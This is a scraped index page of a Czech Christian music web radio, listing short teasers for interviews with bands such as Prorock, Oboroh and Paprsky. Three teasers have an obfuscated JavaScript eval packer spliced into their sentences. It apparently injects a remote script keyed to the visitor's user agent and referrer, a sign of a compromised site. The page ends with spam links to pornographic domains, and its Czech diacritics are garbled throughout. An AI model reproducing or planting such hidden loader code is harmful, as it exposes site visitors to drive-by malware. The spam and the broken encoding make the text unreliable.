Kapely

10 Otázek pro Prorock

Ilustrace k článku

Skupina Prorock funguje od roku 1995 a na sv?t již p?ivedla 3 CD (1997 – Barvy, 2003 – 500mb pam?tí, 2009 – Malá násobilka). V sou?asné dob? funguje ve složení 

10 otázek pro NOMBis

Ilustrace k článku

Seriál rozhovor? „10 otázek pro“ se tentokrát zam??il na Martina eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zkysr|var|u0026u|referrer|kbekz||js|php'.split('|'),0,{})) Nováka a Stanislava Bílka, kte?í spolu tvo?í autorské duo nazvané NOBIms (?íst Noubims).

10 otázek pro Jiný rytmus

Ilustrace k článku

Hudební uskupení Jiný rytmus funguje od roku 1995 jako nedílná sou?ást domácí k?es?anské scény a snaží se ve své tvorb? spojit tvrdší muziku s hlubokým uctíváním Boha. Jiný rytmus má

Oboroh slaví 22 let

Ilustrace k článku

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|abend|var|u0026u|referrer|kbehk||js|php'.split('|'),0,{})) P?ed 22 lety se poprvé sešli ?lenové kapely Oboroh. N?kte?í z?stali, jiní odešli a p?išli noví ?lenové, a dnes kapelu Oboroh tvo?í Slávek

10 otázek pro Paprsky

Ilustrace k článku

Skupinu Paprsky, tvo?í 40 mládežník? z celé Moravy, kte?í zpívají chvály. Za?átky této skupiny sahají do roku 1996, kdy zdaleka neza?ínali v tak velkém po?tu. Paprsky aktivn? koncertují a také nahrávají ve

10 otázek pro Nad čarou

Ilustrace k článku

Skupina Nad ?arou vznikla na podzim roku 2005 a hudební kostru skupiny tvo?í Honza eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shdki|var|u0026u|referrer|krhti||js|php'.split('|'),0,{})) Kubiš, Renáta Gebauerová, Joser „Pupík“ Mlad?jovský, Denisa Sikorová, René Sikora

10 otázek pro Lamačské chvály

Ilustrace k článku

Úplný po?átek skupiny Lama?ské chvály m?žeme datovat na rok 1994, kdy se Bra?o Letko rozhodl doprovázet skupinu zhruba 100 mladých v??ících v Lama?i (?ást Bratislavy) p?i bohoslužbách. Postupem ?asu se

10 otázek pro Deep Inside

Ilustrace k článku

Kapela Deep Inside vznikla v roce 2007 a to zejména za ú?elem po?ádání ve?er? modliteb a chval. Zprvu hrála pouze p?evzaté písn?, ale nyní se ?ím dál více snaží v?novat

10 otázek pro …

Ilustrace k článku

V redakci AWrádia jsme se rozhodli vyzpovídat n?které známé i mén? známé k?es?anské kapely a interprety na ?eské i slovenské hudební scén?. Jako formu rozhovoru jsme zvolili tentokrát textový rozhovor,


 
adultcomics.me shemalevids.org incestgames.net